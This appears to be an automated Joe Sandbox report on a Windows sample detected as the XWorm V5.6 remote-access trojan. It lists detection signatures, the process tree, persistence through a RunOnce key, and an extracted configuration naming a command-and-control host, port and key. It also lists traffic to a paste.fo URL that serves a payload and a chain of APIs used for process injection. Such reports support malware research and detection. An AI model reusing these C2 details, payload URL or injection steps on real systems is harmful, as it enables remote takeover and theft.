Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
SecuriteInfo.com.Heur.Mint.Phil.57.5869.22404.exe

Overview

General Information

Sample name:SecuriteInfo.com.Heur.Mint.Phil.57.5869.22404.exe
Analysis ID:1489770
MD5:ff0badeb5d6675c36d8f9068a1232258
SHA1:7d287ad2bcdce85532dea445371a2d3c8295e516
SHA256:5b64cb5b788ccdd6006a7edefe6dcd1d36c9bf09101b53398e6a5938a1cc29c8
Tags:exe
Infos:

Detection

XWorm
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Early bird code injection technique detected
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected XWorm
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
AI detected suspicious sample
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Contains functionality to inject code into remote processes
Contains functionality to inject threads in other processes
Creates a thread in another existing process (thread injection)
Found API chain indicative of debugger detection
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Queues an APC in another process (thread injection)
Sample uses string decryption to hide its real strings
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to query CPU information (cpuid)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • SecuriteInfo.com.Heur.Mint.Phil.57.5869.22404.exe (PID: 6872 cmdline: "C:\Users\user\Desktop\SecuriteInfo.com.Heur.Mint.Phil.57.5869.22404.exe" MD5: FF0BADEB5D6675C36D8F9068A1232258)
    • conhost.exe (PID: 6912 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • msinfo32.exe (PID: 7012 cmdline: "C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe" MD5: 0AED91DA63713BF9F881B03A604A1C9D)
  • FRpl.exe (PID: 6544 cmdline: "C:\Users\user\AppData\Roaming\qNl6oqz9\FRpl.exe" MD5: FF0BADEB5D6675C36D8F9068A1232258)
    • conhost.exe (PID: 6932 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • msinfo32.exe (PID: 6888 cmdline: "C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe" MD5: 0AED91DA63713BF9F881B03A604A1C9D)
  • FRpl.exe (PID: 2284 cmdline: "C:\Users\user\AppData\Roaming\qNl6oqz9\FRpl.exe" MD5: FF0BADEB5D6675C36D8F9068A1232258)
    • conhost.exe (PID: 6092 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • msinfo32.exe (PID: 908 cmdline: "C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe" MD5: 0AED91DA63713BF9F881B03A604A1C9D)
  • cleanup
{"C2 url": ["cameras-commitment.gl.at.ply.gg"], "Port": "20343", "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.6"}
SourceRuleDescriptionAuthorStrings
00000003.00000003.1863566508.000002806C4D0000.00000004.00000020.00020000.00000000.sdmpWindows_Trojan_Donutloader_f40e3759unknownunknown
  • 0x25d58:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49
  • 0x35d68:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49
  • 0x3929e:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB
0000000B.00000002.1976262296.0000027ADEE40000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_XWormYara detected XWormJoe Security
    0000000B.00000002.1976262296.0000027ADEE40000.00000004.08000000.00040000.00000000.sdmpMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
    • 0xc254:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
    • 0xc2f1:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
    • 0xc406:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
    • 0xbf01:$cnc4: POST / HTTP/1.1
    00000005.00000002.1897543968.00000204FD660000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_Donutloader_f40e3759unknownunknown
    • 0xff08:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49
    • 0x1343e:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB
    00000005.00000002.1897725884.00000204FD720000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_XWormYara detected XWormJoe Security
      Click to see the 18 entries
      SourceRuleDescriptionAuthorStrings
      11.2.msinfo32.exe.27adee40000.0.unpackJoeSecurity_XWormYara detected XWormJoe Security
        11.2.msinfo32.exe.27adee40000.0.unpackMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
        • 0xa454:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
        • 0xa4f1:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
        • 0xa606:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
        • 0xa101:$cnc4: POST / HTTP/1.1
        2.2.msinfo32.exe.1aa12890000.0.unpackJoeSecurity_XWormYara detected XWormJoe Security
          2.2.msinfo32.exe.1aa12890000.0.unpackMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
          • 0xa454:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
          • 0xa4f1:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
          • 0xa606:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
          • 0xa101:$cnc4: POST / HTTP/1.1
          11.2.msinfo32.exe.27adee40000.0.raw.unpackJoeSecurity_XWormYara detected XWormJoe Security
            Click to see the 15 entries

            System Summary

            barindex
            Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Roaming\qNl6oqz9\FRpl.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\SecuriteInfo.com.Heur.Mint.Phil.57.5869.22404.exe, ProcessId: 6872, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\9Q9QTPMV20RVO8c4
            Timestamp:2024-08-08T02:38:40.864390+0200
            SID:2853193
            Severity:1
            Source Port:49746
            Destination Port:20343
            Protocol:TCP
            Classtype:Malware Command and Control Activity Detected
            Timestamp:2024-08-08T02:36:24.326130+0200
            SID:2803274
            Severity:2
            Source Port:49739
            Destination Port:443
            Protocol:TCP
            Classtype:Potentially Bad Traffic
            Timestamp:2024-08-08T02:36:16.355177+0200
            SID:2803274
            Severity:2
            Source Port:49732
            Destination Port:443
            Protocol:TCP
            Classtype:Potentially Bad Traffic
            Timestamp:2024-08-08T02:36:44.411331+0200
            SID:2855924
            Severity:1
            Source Port:49740
            Destination Port:20343
            Protocol:TCP
            Classtype:Malware Command and Control Activity Detected
            Timestamp:2024-08-08T02:36:01.741479+0200
            SID:2803274
            Severity:2
            Source Port:49730
            Destination Port:443
            Protocol:TCP
            Classtype:Potentially Bad Traffic
            Timestamp:2024-08-08T02:36:26.755485+0200
            SID:2855924
            Severity:1
            Source Port:49731
            Destination Port:20343
            Protocol:TCP
            Classtype:Malware Command and Control Activity Detected

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Source: 0000000B.00000002.1976311824.0000027ADEF21000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Xworm {"C2 url": ["cameras-commitment.gl.at.ply.gg"], "Port": "20343", "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.6"}
            Source: C:\Users\user\AppData\Roaming\qNl6oqz9\FRpl.exeVirustotal: Detection: 25%Perma Link
            Source: SecuriteInfo.com.Heur.Mint.Phil.57.5869.22404.exeVirustotal: Detection: 25%Perma Link
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Source: 2.2.msinfo32.exe.1aa12890000.0.raw.unpackString decryptor: cameras-commitment.gl.at.ply.gg
            Source: 2.2.msinfo32.exe.1aa12890000.0.raw.unpackString decryptor: 20343
            Source: 2.2.msinfo32.exe.1aa12890000.0.raw.unpackString decryptor: <123456789>
            Source: 2.2.msinfo32.exe.1aa12890000.0.raw.unpackString decryptor: <Xwormmm>
            Source: 2.2.msinfo32.exe.1aa12890000.0.raw.unpackString decryptor: XWorm V5.6
            Source: 2.2.msinfo32.exe.1aa12890000.0.raw.unpackString decryptor: USB.exe
            Source: unknownHTTPS traffic detected: 104.21.28.76:443 -> 192.168.2.4:49730 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.28.76:443 -> 192.168.2.4:49732 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.28.76:443 -> 192.168.2.4:49739 version: TLS 1.2
            Source: SecuriteInfo.com.Heur.Mint.Phil.57.5869.22404.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT

            Networking

            barindex
            Source: Malware configuration extractorURLs: cameras-commitment.gl.at.ply.gg
            Source: global trafficTCP traffic: 192.168.2.4:49731 -> 147.185.221.16:20343
            Source: Joe Sandbox ViewIP Address: 147.185.221.16 147.185.221.16
            Source: Joe Sandbox ViewASN Name: SALSGIVERUS SALSGIVERUS
            Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.Mint.Phil.57.5869.22404.exeCode function: 0_2_00294AA1 LoadLibraryA,LoadLibraryA,CreateProcessA,VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,VirtualProtectEx,WriteProcessMemory,VirtualProtectEx,VirtualProtectEx,WriteProcessMemory,VirtualProtectEx,memset,InternetOpenA,InternetOpenUrlA,InternetReadFile,memset,memcpy,memcpy,memcpy,memcpy,memcpy,memcpy,memset,RtlDeleteBoundaryDescriptor,VirtualAllocEx,WriteProcessMemory,QueueUserAPC,ResumeThread,SetLastError,GetModuleFileNameW,GetLastError,GetLastError,CopyFileExW,RegCreateKeyExA,RegSetValueExA,RtlRestoreThreadPreferredUILanguages,RtlDeleteBoundaryDescriptor,GetLastError,GetLastError,0_2_00294AA1
            Source: global trafficHTTP traffic detected: GET /raw/9c15a0ff5499 HTTP/1.1User-Agent: WebReaderHost: paste.fo
            Source: global trafficHTTP traffic detected: GET /raw/9c15a0ff5499 HTTP/1.1User-Agent: WebReaderHost: paste.fo
            Source: global trafficHTTP traffic detected: GET /raw/9c15a0ff5499 HTTP/1.1User-Agent: WebReaderHost: paste.fo
            Source: global trafficDNS traffic detected: DNS query: paste.fo
            Source: global trafficDNS traffic detected: DNS query: cameras-commitment.gl.at.ply.gg
            Source: msinfo32.exe, 00000002.00000002.4156949853.000001AA12B31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: SecuriteInfo.com.Heur.Mint.Phil.57.5869.22404.exe, FRpl.exe.0.drString found in binary or memory: https://docs.rs/getrandom#nodejs-es-module-support/rustc/64ebd39da5ec28caa3bd7cbb3f22f5949432fe2b
            Source: SecuriteInfo.com.Heur.Mint.Phil.57.5869.22404.exe, 00000000.00000002.1721562376.0000025E70A29000.00000004.00000020.00020000.00000000.sdmp, FRpl.exe, 00000003.00000002.1864510706.000002806A7F6000.00000004.00000020.00020000.00000000.sdmp, FRpl.exe, 00000009.00000002.1943889827.00000282C506C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://paste.fo/
            Source: SecuriteInfo.com.Heur.Mint.Phil.57.5869.22404.exe, 00000000.00000002.1721562376.0000025E70A29000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://paste.fo/jH
            Source: FRpl.exe, 00000009.00000002.1943889827.00000282C506C000.00000004.00000020.00020000.00000000.sdmp, FRpl.exe, 00000009.00000002.1943889827.00000282C5026000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://paste.fo/raw/9c15a0ff5499
            Source: FRpl.exe, 00000003.00000002.1864510706.000002806A7F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://paste.fo/raw/9c15a0ff5499#=
            Source: SecuriteInfo.com.Heur.Mint.Phil.57.5869.22404.exe, 00000000.00000002.1721562376.0000025E70A29000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://paste.fo/raw/9c15a0ff5499=)
            Source: FRpl.exe, 00000009.00000002.1943889827.00000282C506C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://paste.fo/raw/9c15a0ff5499D
            Source: FRpl.exe, 00000003.00000002.1864510706.000002806A7F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://paste.fo/raw/9c15a0ff5499G
            Source: FRpl.exe, 00000009.00000002.1943889827.00000282C4FE7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://paste.fo/raw/9c15a0ff5499IUr
            Source: FRpl.exe, 00000003.00000002.1864510706.000002806A7A9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://paste.fo/raw/9c15a0ff5499XN&b
            Source: FRpl.exe, 00000003.00000002.1864510706.000002806A78F000.00000004.00000020.00020000.00000000.sdmp, FRpl.exe, 00000009.00000002.1943889827.00000282C4FE7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://paste.fo/raw/9c15a0ff5499e
            Source: SecuriteInfo.com.Heur.Mint.Phil.57.5869.22404.exe, 00000000.00000003.1718040937.0000025E70A62000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Heur.Mint.Phil.57.5869.22404.exe, 00000000.00000003.1718458434.0000025E70A6D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://paste.fo/raw/9c15a0ff5499j~
            Source: FRpl.exe, 00000009.00000002.1943889827.00000282C5026000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://paste.fo/raw/9c15a0ff5499t(X?
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
            Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
            Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
            Source: unknownHTTPS traffic detected: 104.21.28.76:443 -> 192.168.2.4:49730 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.28.76:443 -> 192.168.2.4:49732 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.28.76:443 -> 192.168.2.4:49739 version: TLS 1.2

            System Summary

            barindex
            Source: 11.2.msinfo32.exe.27adee40000.0.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
            Source: 2.2.msinfo32.exe.1aa12890000.0.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
            Source: 11.2.msinfo32.exe.27adee40000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
            Source: 11.2.msinfo32.exe.27adef2d008.1.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
            Source: 2.2.msinfo32.exe.1aa12890000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
            Source: 5.2.msinfo32.exe.204fd720000.1.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
            Source: 5.2.msinfo32.exe.2048000d008.0.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
            Source: 5.2.msinfo32.exe.204fd720000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
            Source: 5.2.msinfo32.exe.2048000d008.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
            Source: 11.2.msinfo32.exe.27adef2d008.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
            Source: 00000003.00000003.1863566508.000002806C4D0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
            Source: 0000000B.00000002.1976262296.0000027ADEE40000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
            Source: 00000005.00000002.1897543968.00000204FD660000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
            Source: 00000005.00000002.1897725884.00000204FD720000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
            Source: 00000009.00000003.1943122985.00000282C50AE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
            Source: 00000003.00000003.1863731126.000002806C4F5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
            Source: 0000000B.00000002.1976117321.0000027ADED60000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
            Source: 0000000B.00000002.1976311824.0000027ADEF21000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
            Source: 00000002.00000002.4156638612.000001AA11010000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
            Source: 00000000.00000003.1720661736.0000025E727F5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
            Source: 00000002.00000002.4156799723.000001AA12890000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
            Source: 00000000.00000003.1717644946.0000025E727D0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
            Source: 00000009.00000003.1943224390.00000282C6D25000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
            Source: 00000009.00000003.1943070023.00000282C6D10000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
            Source: 00000005.00000002.1896700546.0000020480001000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.Mint.Phil.57.5869.22404.exeCode function: 0_2_00294AA10_2_00294AA1
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.Mint.Phil.57.5869.22404.exeCode function: 0_2_002AB6F00_2_002AB6F0
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.Mint.Phil.57.5869.22404.exeCode function: 0_2_0029E00C0_2_0029E00C
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.Mint.Phil.57.5869.22404.exeCode function: 0_2_0029D0600_2_0029D060
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.Mint.Phil.57.5869.22404.exeCode function: 0_2_002BC8600_2_002BC860
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.Mint.Phil.57.5869.22404.exeCode function: 0_2_002CA0400_2_002CA040
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.Mint.Phil.57.5869.22404.exeCode function: 0_2_002C78A00_2_002C78A0
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.Mint.Phil.57.5869.22404.exeCode function: 0_2_002C38800_2_002C3880
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.Mint.Phil.57.5869.22404.exeCode function: 0_2_002CD8D00_2_002CD8D0
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.Mint.Phil.57.5869.22404.exeCode function: 0_2_002B51200_2_002B5120
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.Mint.Phil.57.5869.22404.exeCode function: 0_2_0029E90D0_2_0029E90D
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.Mint.Phil.57.5869.22404.exeCode function: 0_2_002B915F0_2_002B915F
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.Mint.Phil.57.5869.22404.exeCode function: 0_2_0029C1500_2_0029C150
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.Mint.Phil.57.5869.22404.exeCode function: 0_2_002AE9E00_2_002AE9E0
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.Mint.Phil.57.5869.22404.exeCode function: 0_2_002C59E00_2_002C59E0
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.Mint.Phil.57.5869.22404.exeCode function: 0_2_002921C70_2_002921C7
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.Mint.Phil.57.5869.22404.exeCode function: 0_2_002C71D00_2_002C71D0
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.Mint.Phil.57.5869.22404.exeCode function: 0_2_002BAA2F0_2_002BAA2F
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.Mint.Phil.57.5869.22404.exeCode function: 0_2_002CB2300_2_002CB230
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.Mint.Phil.57.5869.22404.exeCode function: 0_2_00292AB90_2_00292AB9
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.Mint.Phil.57.5869.22404.exeCode function: 0_2_002A4A800_2_002A4A80
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.Mint.Phil.57.5869.22404.exeCode function: 0_2_0029E2E40_2_0029E2E4
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.Mint.Phil.57.5869.22404.exeCode function: 0_2_002BA2C00_2_002BA2C0
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.Mint.Phil.57.5869.22404.exeCode function: 0_2_002B02C00_2_002B02C0
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.Mint.Phil.57.5869.22404.exeCode function: 0_2_00299B200_2_00299B20
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.Mint.Phil.57.5869.22404.exeCode function: 0_2_002AF3200_2_002AF320
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.Mint.Phil.57.5869.22404.exeCode function: 0_2_002B4B200_2_002B4B20
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.Mint.Phil.57.5869.22404.exeCode function: 0_2_002A73300_2_002A7330
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.Mint.Phil.57.5869.22404.exeCode function: 0_2_002C53100_2_002C5310
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.Mint.Phil.57.5869.22404.exeCode function: 0_2_002A1B610_2_002A1B61
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.Mint.Phil.57.5869.22404.exeCode function: 0_2_00293B760_2_00293B76
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.Mint.Phil.57.5869.22404.exeCode function: 0_2_002A2BFB0_2_002A2BFB
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.Mint.Phil.57.5869.22404.exeCode function: 0_2_002C2BC00_2_002C2BC0
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.Mint.Phil.57.5869.22404.exeCode function: 0_2_002D04100_2_002D0410
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.Mint.Phil.57.5869.22404.exeCode function: 0_2_002AD4B00_2_002AD4B0
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.Mint.Phil.57.5869.22404.exeCode function: 0_2_002C24800_2_002C2480
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.Mint.Phil.57.5869.22404.exeCode function: 0_2_002CF5000_2_002CF500
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.Mint.Phil.57.5869.22404.exeCode function: 0_2_0029E5740_2_0029E574
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.Mint.Phil.57.5869.22404.exeCode function: 0_2_002BDDB00_2_002BDDB0
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.Mint.Phil.57.5869.22404.exeCode function: 0_2_002C1E100_2_002C1E10
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.Mint.Phil.57.5869.22404.exeCode function: 0_2_002B9E600_2_002B9E60
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.Mint.Phil.57.5869.22404.exeCode function: 0_2_002C06A00_2_002C06A0
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.Mint.Phil.57.5869.22404.exeCode function: 0_2_0029E6CC0_2_0029E6CC
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.Mint.Phil.57.5869.22404.exeCode function: 0_2_002C3F600_2_002C3F60
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.Mint.Phil.57.5869.22404.exeCode function: 0_2_0029E77F0_2_0029E77F
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.Mint.Phil.57.5869.22404.exeCode function: 0_2_002A97900_2_002A9790
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.Mint.Phil.57.5869.22404.exeCode function: 0_2_002CA7900_2_002CA790
            Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exeCode function: 2_2_000001AA110215782_2_000001AA11021578
            Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exeCode function: 2_2_000001AA1102119C2_2_000001AA1102119C
            Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exeCode function: 2_2_000001AA110219A82_2_000001AA110219A8
            Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exeCode function: 2_2_000001AA110202C02_2_000001AA110202C0
            Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exeCode function: 2_2_000001AA11024C542_2_000001AA11024C54
            Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exeCode function: 2_2_000001AA1102245C2_2_000001AA1102245C
            Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exeCode function: 2_2_00007FFD9B890EFA2_2_00007FFD9B890EFA
            Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exeCode function: 2_2_00007FFD9B895CE62_2_00007FFD9B895CE6
            Source: C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exeCode function: 2_2_00007FFD9B896A922_2_00007FFD9B896A92
            Source: C:\Users\user\AppData\Roaming\qNl6oqz9\FRpl.exeCode function: 3_2_00B64AA13_2_00B64AA1
            Source: C:\Users\user\AppData\Roaming\qNl6oqz9\FRpl.exeCode function: 3_2_00B7B6F03_2_00B7B6F0
            Source: C:\Users\user\AppData\Roaming\qNl6oqz9\FRpl.exeCode function: 3_2_00B978A03_2_00B978A0
            Source: C:\Users\user\AppData\Roaming\qNl6oqz9\FRpl.exeCode function: 3_2_00B938803_2_00B93880
            Source: C:\Users\user\AppData\Roaming\qNl6oqz9\FRpl.exeCode function: 3_2_00B9D8D03_2_00B9D8D0
            Source: C:\Users\user\AppData\Roaming\qNl6oqz9\FRpl.exeCode function: 3_2_00B6E00C3_2_00B6E00C
            Source: C:\Users\user\AppData\Roaming\qNl6oqz9\FRpl.exeCode function: 3_2_00B6D0603_2_00B6D060
            Source: C:\Users\user\AppData\Roaming\qNl6oqz9\FRpl.exeCode function: 3_2_00B8C8603_2_00B8C860
            Source: C:\Users\user\AppData\Roaming\qNl6oqz9\FRpl.exeCode function: 3_2_00B9A0403_2_00B9A040
            Source: C:\Users\user\AppData\Roaming\qNl6oqz9\FRpl.exeCode function: 3_2_00B7E9E03_2_00B7E9E0
            Source: C:\Users\user\AppData\Roaming\qNl6oqz9\FRpl.exeCode function: 3_2_00B959E03_2_00B959E0
